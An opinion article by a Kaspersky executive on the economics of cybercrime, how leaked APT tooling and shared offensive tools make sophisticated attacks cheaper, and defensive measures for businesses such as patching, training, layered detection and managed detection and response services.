Cybercriminal logic differs little from that of common criminals – both are inspired by the idea of getting more for less effort and escaping punishment.
Adversaries usually want to be cost-effective in their operations, and if the revenue from an attack is less than its cost, it is of no interest to them. This is like a thief being less likely to break into the well-guarded house surrounded by a solid fence and equipped with an advanced alarm system. Of course, the possible pay-off would be great, but preparations for the heist of such a protected target would take time, additional skills, expensive tools, and the risk of detection would still be high. Why do this if there are plenty of easy prey that are vulnerable enough to yield a healthy profit?
Cybercriminals think the same and usually go after soft options. So, the majority of IT security incidents are still connected with easily performed attacks. For instance, according to the recent Kaspersky Incident Response Analytics report, 63% of investigated attacks were caused by insufficient patch management and bad password policy, which proves that a large number of companies still have problems with basic security control. It’s no wonder then that cybercrimes are so profitable: Deloitte study findings show that adversaries can execute a cyberattack for as little as $34 per month and net a revenue of $25K from this.
The situation described above might create an impression that organisations with high-security levels are safe and of no interest to intruders, but that is not true. Firstly, risk factors like human error and complexity of the infrastructure can provide an opening for cybercriminals in even the most secure infrastructure. Also, there is another alarming issue that has already become a growing trend: organising and executing a quality or APT-grade attack is getting easier and therefore more profitable for criminals.
What is an APT-grade attack?
As you may know, a regular Advanced Persistent Threat is very selective. It mainly aims at high-value targets such as national institutions or enterprises of national importance. Its goal is to stay unnoticed for a prolonged period to gain valuable and strategic information or sabotage critical infrastructures. The cost of APT is usually very high as it requires a lot of resources, but it is difficult to evaluate its results in monetary terms due to its intelligence focus.
The APT-grade attack uses an APT toolkit and can make a huge negative impact, but these types of attacks are not the same. Firstly, an APT-grade attack is not committed by APT actors, which are referred to in the MITRE ATT&CK list. Another difference is that an APT-grade intruder has practical objectives. Leaked APT actors’ techniques, tactics, and procedures (TTP) help cybercriminals achieve quick and measurable profit goals such as stealing money or getting a ransom. That is why APT-grade adversaries are not so picky about their targets. The problem is that the advanced TTP they apply significantly complicates detection and response for defenders, so all kinds of organisations are at risk.
The most common example of this type of attack is the WannaCry case, when intruders used the EternalBlue exploit leaked by The Shadow Brokers to infect more than 230,000 computer systems and caused losses of approximately $4 billion.
What is githubification of crimes, and how does it impute the profitability of attacks?
Today, even less advanced cybercriminals can easily obtain APT tools and conduct complex, discreet attacks. It is similar to an ordinary burglar gaining access to the sophisticated plans made by Money Heist character, the Professor. Of course, street criminals couldn’t completely implement such a brilliant plan, but they could definitely adopt some new solutions and increase the efficiency of robberies.
In the world of cybercrime, this situation is a reality due to githubification. This term originally describes a community-based approach in infosec that speeds up learning for defenders. Githubification assumes that information security specialists can learn together and share experience and skills to gain time – ensuring specialists will reach the level of an expert. Unfortunately, adversaries are benefiting from this process too by compounding their skills, so that every attacker can be as good as the best attacker. This approach is time and cost-efficient as it allows the reuse of existing instruments and techniques. This makes it possible for cybercriminals to learn how to perform attacks that go unnoticed instead of creating a tool that endpoint protection solutions can automatically detect. This relates especially to fileless attacks or attacks without malicious software when the adversaries’ code is located in the memory of a system process.
According to the results of the recent Incident response analytics report, almost half of all incident cases in 2020 included the use of existing OS tools like, Living Off the Land Binaries, or LOLBins, well-known offensive tools from GitHub (e.g. Mimikatz, AdFind, and Masscan) and specialised commercial frameworks (Cobalt Strike) that are 13% higher in comparison with the previous year. LOLBins are also especially popular in high-severity incidents that are usually human-driven and make a huge impact.
Natively occurring LOLBins provide the perfect disguise for malware that is aimed to get into company infrastructure and cannot be seen by artificial intelligence (AI). AI aims to find similarities, while adversaries always invent something new and unique. It goes without saying that AI-based technologies can be very helpful and contribute to the reduction of IT security costs, especially for detecting false-positive activities, but high-profile malicious activity is inaccessible for automated solutions. Human-driven malicious activity should be, unsurprisingly, detected by a human.
How business can cope with these types of attacks?
What actions could be taken to protect from this growing threat and reduce the impact of cybercrimes on business? First of all, basic cybersecurity needs should be fulfilled because even the most advanced attacks often start with the exploitation of trivial vulnerabilities:
- Make sure that company employees have a clear understanding of information security policy and know what risks any violations bring. Regular comprehensible security awareness training shouldn’t just be a formal procedure because it is a crucial measure to reduce the negative impact of phishing emails and weak passwords.
- In most cases, attackers use old unpatched vulnerabilities to penetrate the infrastructure. That is why consistent patch management, including regular updates of vulnerability details from software vendors, scanning the network and patch installation updates, is a must-have for all kinds of organisations.
The next stage in improving IT security readiness is adequate detection and response measures:
- Сombine different tactics to detect threats. Even a complex attack consists of simple steps and techniques¹ – detection of a particular technique can reveal the whole attack. Different detection technologies contribute to finding different adversary techniques and maintaining a variety of security technologies raises the detection chances. At the very least, an endpoint protection platform and network intrusion detection system should be used.
- Security Operation Centers or SOC teams have to ensure that they possess relevant skills and tools. For instance, red teaming exercises have to simulate realistic complicated attacks which leverage the latest adversary tactics, such as new evasion techniques using CLR, and provide a clear picture of the company’s operational security status.
- Managed Detection and Response services can be a cost-efficient solution for companies with any level of informational security. For companies with less cybersecurity maturity, this type of service can replace SOC as it provides automatic as well as manual threat detection that is essential for fileless attacks. The more advanced companies still can benefit from MDR because it gives additional scanning and expert evaluation of the incidents.
Amir Kanaan is the Managing Director for Middle East, Turkey and Africa at Kaspersky